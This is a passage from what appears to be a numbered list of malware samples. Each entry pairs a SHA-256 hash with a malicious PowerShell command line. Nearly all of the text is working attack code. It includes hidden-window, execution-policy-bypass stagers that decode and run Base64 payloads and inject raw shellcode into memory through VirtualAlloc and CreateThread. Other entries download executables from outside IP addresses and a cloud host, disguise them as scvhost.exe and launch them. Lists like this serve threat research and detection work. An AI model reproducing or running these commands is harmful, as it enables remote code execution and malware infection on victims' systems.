0xda,0x4f,0xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  185. 1a630967c00c7ac77872d90852ad37bed76ae4a884d326e4381fb8cfc82d1848
  186. powershell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$windir1=Get-ChildItem Env:windir;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVRtb9pIEP7OrxhZe5KtYMe8NG2wIjWFps1dSXOBJr1D6LTYA95mveus1wFC+e83Bh+hX++L1zOeneeZmWfMnuAC3juNyUDK6yzXxrrOIxqFstMOEikdbwp5OZMihsJySweuLH2Ha2VvrYF7YWzJ5aWUOnZrn8wvk8RgUTShFMpCshyJF6yN+T6WUmk1Xuev7lujLcbWi/43l75BbnGc0pG8ctnbl9YaMSstHpGyPH7cMzsEk8/YA/uD+5YbniFhHS7vsKiEK8kXx5F7tOuEynDeN6xZb1hCHXYuP/QHH68+fb7+/Y8vw5uvt3/ejcbf7h++//U3n8UJzhep+PEoM6XzJ1PY8nm5Wr+ErXan++bs7btzJxjrfsrNpTF87XqNeaniCh1ilz17GzBoS+qD606I3WQ6Bfb86w34CUPkRWnQ/zr7QW0Gf1RmXkAP+A3CVSsMwccnOG9729fsFjZsXrF3olYQdH7ONRUXp77epaBvJxfAkom7QOsbrhKdgZ/xlcgoK0uCL6gWNvWm26jmx+bRUXaEDeRGx9Rq2Ex4RXTKVgRHjxNg/2wjQJUQhRWxL0gNNS5sXIXL/4y7Ha4XKNKC6223RwCLDRBjcJm4CCMmwJcWzrr0dnLibVhKSDZijxVgQggYAdQF0hUJgvg+UlxRBaQVIxmBmINLPS88Dw5dpwiCrQ3n/Pn7N4fKnNygDUZonkWMt5rGMuSKL9BMe73Ki6aPxoq5oE3Aey5FspNTn0s5I1kS5oZZU+I2YhkZN1RwPbjRurCYBVX6B5z1pUBlowbLgs8kPDRFQPJ1nbJA4xOesk4TnKF+EVLy024QEn+d5QQ2k1TxcHT9Ec6CVgQPgvq4LOBm7DlexBSBLiKYfFhb3Akqr9qQBQO9VFLzZMAtd53U2rzonZ6Ws1Y3WCIRK43OMYilLhOe5wF/IckFhNjrdjunTDngNZimVETSr9afBIPZDM0A50KJ3djYE/g3tG7gEKdO2wFfkVXkPEbYea7qARfg57wobGrKBltdMN3r/fI7Cpssr0XYDFedMAzp6IZeNKl7eFcqKzIMaHuReNfTKoIhN0XKJY2qr/O1y/ImhE2Y7Jd86rIVLRcZnbbreU04gFSl0ZXjvxAhNtmqWR1htYS6tL4qJSlp96fxRxIxp13EWJPU3511w3BLiojTzfZf \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$windir1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -exec Bypass IEX $($iex1) -->  +++ $q = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"@try{$d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789".ToCharArray()function c($v){ return (([int[]] $v.ToCharArray() | Measure-Object -Sum).Sum % 0x100 -eq 92)}function t {$f = "";1..3|foreach-object{$f+= $d[(get-random -maximum $d.Length)]};return $f;}function e { process {[array]$x = $x + $_}; end {$x | sort-object {(new-object Random).next()}}}function g{ for ($i=0;$i -lt 64;$i++){$h = t;$k = $d | e;  foreach ($l in $k){$s = $h + $l; if (c($s)) { return $s }}}return "9vXU";}[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$m = New-Object System.Net.WebClient;$m.Headers.Add("user-agent", "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)");$n = g; [Byte[]] $p = $m.DownloadData("https://ub14.westeurope.cloudapp.azure.com:443/$n" )$o = Add-Type -memberDefinition $q -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,$p.Length,0x3000,0x40);[System.Runtime.InteropServices.Marshal]::Copy($p, 0, [IntPtr]($x.ToInt32()), $p.Length)$o::CreateThread(0,0,$x,0,0,0) | out-null; Start-Sleep -Second 86400}catch{}
  187. ce9555fdce7fafafaba96a7af54b3e5c125d067010c30080ca2c1f71bc7404ce
  188. PowerShell.exe -NoP -NonI -W Hidden -Exec Bypass $arch=$ENV:Processor_architecture;$windir1=Get-ChildItem Env:windir;$run=$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\" nVZdj5tGFH33rxhZPNhasxpgABNrpaSNKkWqokq7ah4sP8AwZFExtjBOvUn638s9+A7Guxu1ebnMx517zv0axtHiTrydTtbvq+rDdr9r2tn0L9PUpgr827yqpvON2B+zqtTi0KZt9zGnttsXH+r2j7YRf5ZNe0yrd1W107Pz2t8LcSzrVpzO36fz9+t89dM4vzYmbc3DY/fJGed4tvtlIQbk8+gC+7xyjb49fNFN+1+wt2Z7MO3suWXr1fTtxNl1gXyX5+7D094ItzuTmea9Kcq6bMtdLRwt3I/p1ojpp7IO/Klw62522KfaCKz8dqw1aR6Eu08Ph/axOU6c052ze/NmFGS5kCdPSvoE/UfJ+Uqsf3lqzXqzcQ6UUXkqdLdjlp1YJp2A4iAiyRsmJENeJ3KfNhRtZJ0IfSCMplKPpp5VjmnqE5osOpHFRCultYjNFwWPNBlNyVRAIqK1mEYSVmjkk4qGMh2TOQlMybIhvUIyjTAes7Kclc8YOJsPGzSKEZyQCcWKOQ/K4XCClL2lBVoyyV45IFYBo6mE9QIboV7vh9F41d+A0AxIEt2CjEpCi0mvoN0g46mvWA9hCq84qxHnKLL8QDwbKXt6pNzrXXlkC0kpNg8RZiyQ35BUQopuaN2HRwAKC96FZY+IG3AhfiG5FZFeZEiEnK2+lGkjpjBFiVVJmJWBAcV6SrMyClPGzCW3bYApSupaRGwlSHkaE0Y6tgLiaDC43yc5Yc8hopQzeLWGggsDHgGtL28ykBCGjp6jqYJDPHQyegEG+rvCZ1ZLxbsXwrMjiwvLIWH4hitswAUhcAFxz/qLs0tABovLO6fPh7TuK4sGA8UoxChgRdPEcB38/0T56COaonXjKxeG3qeRR0DoANxhCBNOXN2diEtODAySIl9QITT0NNAG4ZNAQ/R1quw04Dj35b3k0QAZDdWEYBej+OHuHEavb8QcnJzWiohHypJEcJJghIaLIlty3lC7PkoAacSlQMFGg/WXzHJkILPH+hr3RolCxyeRrRL/tUQpzmr4wu3t2XJE1EJbYT01ezfhrhtabSgVBCelLIRXpYILXrP7yIc2IwPohd4FFOHYhQtWNgEIDi68qOBjL52AMn53GW2kPofu4hYgFVTiVcEp3J0JVxj+00CLAx4htX1gX60/JD56bj6CMznTjWBeW8uxNTqgoSXlalLsGjFzyju5ckrhVqabHPTt76b+3D663rxbvbmZi2/0/jk/wNb9C2wzc063D7tuEviz+Y1TzheiO7p2ys1CeHPxXeyOrVsfq2r1z8T5ihfU6PnYebRwTgv60Mvpvk2b1r2vjNkL997oXZ0LemBJ+S8= \" )))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();$iex1 = Invoke-Expression $run;if($arch.Contains(\"64\")){$powerComm=$windir1.Value.ToString() +\"\\SysWOW64\\windowspowershell\\v1.0\\powershell.exe\";}else{$powerComm=\"powershell.exe\";};&$powerComm -exec Bypass IEX $($iex1) -->  +++ $c = @"[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr w, uint x, uint y, uint z);[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr u, uint v, IntPtr w, IntPtr x, uint y, IntPtr z);[DllImport("msvcrt.dll")] public static extern IntPtr memset(IntPtr x, uint y, uint z);"@$o = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru$x=$o::VirtualAlloc(0,0x1000,0x3000,0x40); [Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x89,0xe6,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x60,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x6a,0x50,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x4f,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0x60,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1e,0x4b,0x0f,0x84,0x7b,0x00,0x00,0x00,0xeb,0xd1,0xe9,0x90,0x00,0x00,0x00,0xe8,0xac,0xff,0xff,0xff,0x2f,0x61,0x6e,0x64,0x61,0x63,0x2e,0x65,0x78,0x65,0x00,0xeb,0x6b,0x31,0xc0,0x5f,0x50,0x6a,0x02,0x6a,0x02,0x50,0x6a,0x02,0x6a,0x02,0x57,0x68,0xda,0xf6,0xda,0x4f,0xff,0xd5,0x93,0x31,0xc0,0x66,0xb8,0x04,0x03,0x29,0xc4,0x54,0x8d,0x4c,0x24,0x08,0x31,0xc0,0xb4,0x03,0x50,0x51,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0x2d,0x58,0x85,0xc0,0x74,0x16,0x6a,0x00,0x54,0x50,0x8d,0x44,0x24,0x0c,0x50,0x53,0x68,0x2d,0x57,0xae,0x5b,0xff,0xd5,0x83,0xec,0x04,0xeb,0xce,0x53,0x68,0xc6,0x96,0x87,0x52,0xff,0xd5,0x6a,0x00,0x57,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,0x6a,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0xe8,0x90,0xff,0xff,0xff,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2e,0x65,0x78,0x65,0x00,0xe8,0x06,0xff,0xff,0xff,0x67,0x6d,0x6a,0x62,0x6c,0x6f,0x67,0x2e,0x63,0x6f,0x6d,0x00;for ($i=0;$i -le ($sc.Length-1);$i++) {$o::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1) | out-null;}$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000
  189. 3348d1d9eb7dbdd6d476a6512d6af40c7819c8a07097344fc210885fcca08611
  190. powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AGMAPQBOAGUAVwAtAE8AQgBqAEUAYwBUACAAUwB5AHMAVABlAG0ALgBOAGUAVAAuAFcAZQBiAEMAbABpAEUAbgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAkAFcAYwAuAEgARQBhAGQARQBSAHMALgBBAGQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAcgBPAFgAeQAgAD0AIABbAFMAeQBzAFQAZQBNAC4ATgBlAHQALgBXAEUAYgBSAGUAcQBVAGUAUwBUAF0AOgA6AEQAZQBmAEEAdQBMAFQAVwBFAEIAUAByAG8AeABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIARQBkAGUATgBUAGkAQQBMAFMAIAA9ACAAWwBTAHkAcwBUAGUATQAuAE4ARQBUAC4AQwByAEUAZABlAG4AVABJAEEATABDAEEAQwBoAGUAXQA6ADoARABlAGYAQQBVAGwAVABOAGUAdAB3AG8AUgBrAEMAcgBFAGQARQBOAFQAaQBBAEwAcwA7ACQASwA9ACcALgB5ACkAUgBIAFQAQQBOAFoATQBnADkAKABAAEMAOABZAHQAIQBFAF0ANQB+AFgAUABuAGQAXwBhAEoAawAzACcAOwAkAEkAPQAwADsAWwBDAGgAQQByAFsAXQBdACQAYgA9ACgAWwBDAGgAYQByAFsAXQBdACgAJABXAEMALgBEAE8AdwBOAGwAbwBBAEQAUwBUAHIASQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwA3ADQALgAyADAAMgAuADIANAAyAC4AMgAwADoANAA0ADMALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAHIAJABrAFsAJABJACsAKwAlACQASwAuAEwARQBOAGcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBKAG8ASQBOACcAJwApAA== --> $wc=NeW-OBjEcT SysTem.NeT.WebCliEnt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$Wc.HEadERs.AdD('User-Agent',$u);$Wc.PrOXy = [SysTeM.Net.WEbReqUeST]::DefAuLTWEBProxY;$WC.ProXY.CREdeNTiALS = [SysTeM.NET.CrEdenTIALCAChe]::DefAUlTNetwoRkCrEdENTiALs;$K='.y)RHTANZMg9(@C8Yt!E]5~XPnd_aJk3';$I=0;[ChAr[]]$b=([Char[]]($WC.DOwNloADSTrIng("https://74.202.242.20:443/index.asp")))|%{$_-BXor$k[$I++%$K.LENgth]};IEX ($B-JoIN'')
  191. b7d3cd6cd98fa476c9c6a719459664126929ac79c6c4d31821bf1bad8dd035cb
  192. POWERSHELL.EXE powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADkALgAyADQAOAAuADEANgA2AC4AMQA0ADAALwB+AHoAZQBiAHIAYQAvAGkAZQBzAGUAYwB2AC4AZQB4AGUAJwAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBrAGUAbQAuAGUAeABlACIAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBrAGUAbQAuAGUAeABlACIAKQA= --> (New-Object System.Net.WebClient).DownloadFile('http://89.248.166.140/~zebra/iesecv.exe',"$env:APPDATA\scvkem.exe");Start-Process ("$env:APPDATA\scvkem.exe")
  193. f44ba234ed084e4c38e568ad38039fd087e8c4206d7a6369703af85cbcf64765
  194. POWERSHELL.EXE powershell -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADcANAAuADkANAAuADEAMwA3AC8AfgBrAGEAcgBtAGEALwBzAGMAdgBoAG8AcwB0AC4AZQB4AGUAJwAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBoAG8AcwB0AC4AZQB4AGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAHMAYwB2AGgAbwBzAHQALgBlAHgAZQAiACkA --> (New-Object System.Net.WebClient).DownloadFile('http://93.174.94.137/~karma/scvhost.exe',"$env:APPDATA\scvhost.exe");Start-Process ("$env:APPDATA\scvhost.exe")
  195. 85eddb2bf83b31c3c94bf8f44c8560a193400ded27f7e494839e6dbc471728bb
  196. POWERSHELL.EXE powershell -window hidden -enc UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADQALgAxADAAMgAuADUAMgAuADEAMwAvAH4AaABhAHIAdgB5AC8AcwBjAHYAaABvAHMAdAAuAGUAeABlACcALAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAcwBjAHYAaABvAHMAdAAuAGUAeABlAB0gKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABzAGMAdgBoAG8AcwB0AC4AZQB4AGUAHSApAA== --> PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://94.102.52.13/~harvy/scvhost.exe', $env:APPDATA\scvhost.exe );Start-Process ( $env:APPDATA\scvhost.exe )
  197. f59ae9e1b2d31563555795900539e365f3dc17295eacdacd8d251aa7836bee56
  198. powershell.exe -window hidden -EncodedCommand JABaAFoATAB0ACAAPQAgACcAJAA5AFcAawAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA5AFcAawAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGEALAAwAHgAOAA0ACwAMAB4AGIAYgAsADAAeAAwAGYALAAwAHgAYwBjACwAMAB4AGQAYQAsADAAeABkAGQALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAOAAsADAAeAAzADEALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA2AGYALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4ADcAMQAsADAAeAA0ADcALAAwAHgAZQA3ACwAMAB4ADQANQAsADAAeAA3ADkALAAwAHgAYgA4ACwAMAB4AGYAOAAsADAAeAAzADUALAAwAHgAZgAwACwAMAB4ADUAZAAsADAAeABjADkALAAwAHgANgA3ACwAMAB4ADYANgAsADAAeAAxADUALAAwAHgANwA4ACwAMAB4AGIAOAAsADAAeABlAGQALAAwAHgANwBiACwAMAB4ADcAMQAsADAAeAAzADMALAAwAHgAYQAzACwAMAB4ADYAZgAsADAAeAAwADIALAAwAHgAMwAxACwAMAB4ADYAYgAsADAAeAA5AGYALAAwAHgAYQAzACwAMAB4AGYAYwAsADAAeAA0AGQALAAwAHgAYQBlACwAMAB4ADMANAAsADAAeAAzADEALAAwAHgANQAxACwAMAB4ADcAYwAsADAAeABmADYALAAwAHgANQAzACwAMAB4ADIAZAAsADAAeAA3AGYALAAwAHgAMgBiACwAMAB4AGIANAAsADAAeAAwAGMALAAwAHgAYgAwACwAMAB4ADMAZQAsADAAeABiADUALAAwAHgANAA5ACwAMAB4AGEAZAAsADAAeABiADEALAAwAHgAZQA3ACwAMAB4ADAAMgAsADAAeABiADkALAAwAHgANgAwACwAMAB4ADEAOAAsADAAeAAyADcALAAwAHgAZgBmACwAMAB4AGIAOAAsADAAeAAxADkALAAwAHgAZQA3ACwAMAB4ADgAYgAsADAAeAA4ADEALAAwAHgANgAxACwAMAB4ADgAMgAsADAAeAA0AGMALAAwAHgANwA1ACwAMAB4AGQAOAAsADAAeAA4AGQALAAwAHgAOQBjACwAMAB4ADIANgAsADAAeAA1ADcALAAwAHgAYwA1ACwAMAB4ADAANAAsADAAeAA0AGMALAAwAHgAMwBmACwAMAB4AGYANQAsADAAeAAzADUALAAwAHgAOAAxACwAMAB4ADIAMwAsADAAeABjADkALAAwAHgANwBjACwAMAB4AGEAZQAsADAAeAA5ADAALAAwAHgAYgBhACwAMAB4ADcAZQAsADAAeAA2ADYALAAwAHgAZQA5ACwAMAB4ADQAMwAsADAAeABiADEALAAwAHgANAA2ACwAMAB4AGEANgAsADAAeAA3AGEALAAwAHgANwBkACwAMAB4ADQAYgAsADAAeABiADYALAAwAHgAYgBiACwAMAB4AGIAYQAsADAAeABiADQALAAwAHgAYwBkACwAMAB4AGIANwAsADAAeABiADgALAAwAHgANAA5ACwAMAB4AGQANgAsADAAeAAwAGMALAAwAHgAYwAyACwAMAB4ADkANQAsADAAeAA1ADMALAAwAHgAOQAwACwAMAB4ADYANAAsADAAeAA1AGQALAAwAHgAYwAzACwAMAB4ADcAMAAsADAAeAA5ADQALAAwAHgAYgAyACwAMAB4ADkAMgAsADAAeABmADMALAAwAHgAOQBhACwAMAB4ADcAZgAsADAAeABkADAALAAwAHgANQBiACwAMAB4AGIAZgAsADAAeAA3AGUALAAwAHgAMwA1ACwAMAB4AGQAMAAsADAAeABiAGIALAAwAHgAMABiACwAMAB4AGIAOAAsADAAeAAzADYALAAwAHgANABhACwAMAB4ADQAZgAsADAAeAA5AGYALAAwAHgAOQAyACwAMAB4ADEANgAsADAAeAAwAGIALAAwAHgAYgBlACwAMAB4ADgAMwAsADAAeABmADIALAAwAHgAZgBhACwAMAB4AGIAZgAsADAAeABkADMALAAwAHgANQBiACwAMAB4AGEAMgAsADAAeAA2ADUALAAwAHgAOQA4ACwAMAB4ADQAZQAsADAAeABiADcALAAwAHgAMQBjACwAMAB4AGMAMwAsADAAeAAwADYALAAwAHgAMgA5ACwAMAB4ADQANAAsADAAeAA4AGYALAAwAHgAZAA2ACwAMAB4AGQAZAAsADAAeABmADEALAAwAHgAMAA2ACwAMAB4AGIAOQAsADAAeAA3ADQALAAwAHgANwA3ACwAMAB4ADMAZQAsADAAeAAxADEALAAwAHgAZQBmACwAMAB4AGMAYgAsADAAeABjADkALAAwAHgAYgBjACwAMAB4AGUAOAAsADAAeAAyAGMALAAwAHgAZQAwACwAMAB4AGYAMAAsADAAeAAwADkALAAwAHgAOAA1ACwAMAB4ADUAZAAsADAAeABhADQALAAwAHgAYQAyACwAMAB4ADcAYwAsADAAeAAwADkALAAwAHgANwAwACwAMAB4ADEAYgAsADAAeABmADgALAAwAHgANgBlACwAMAB4ADcAYgAsADAAeAA3ADYALAAwAHgAMQAxACwAMAB4ADEAMAAsADAAeABkAGYALAAwAHgANAA4ACwAMAB4ADIAZgAsADAAeAA4ADEALAAwAHgAOABlACwAMAB4AGMAMAAsADAAeABhAGMALAAwAHgANwAwACwAMAB4ADYAMAAsADAAeAA3AGYALAAwAHgAZQAzACwAMAB4ADIAMQAsADAAeABkADIALAAwAHgAMQA3ACwAMAB4ADUANAAsADAAeAA0AGMALAAwAHgANABkACwAMAB4ADIAMQAsADAAeABhADUALAAwAHgAOQBiACwAMAB4ADkAOQAsADAAeABlADEALAAwAHgAMAAzACwAMAB4ADEAMgAsADAAeAA4AGMALAAwAHgAYQBjACwAMAB4AGQAYgAsADAAeAA1ADQALAAwAHgAMAAyACwAMAB4ADMAMQAsADAAeAA5ADgALAAwAHgAMAA2ACwAMAB4ADMAMAAsADAAeABlADMALAAwAHgAZgAxACwAMAB4AGYANAAsADAAeABlADQALAAwAHgANgBiACwAMAB4ADEAOQAsADAAeABhAGQALAAwAHgAMgBhACwAMAB4ADUANwAsADAAeAAyADIALAAwAHgAOQA4ACwAMAB4AGIAYQAsADAAeAA2ADEALAAwAHgAYgA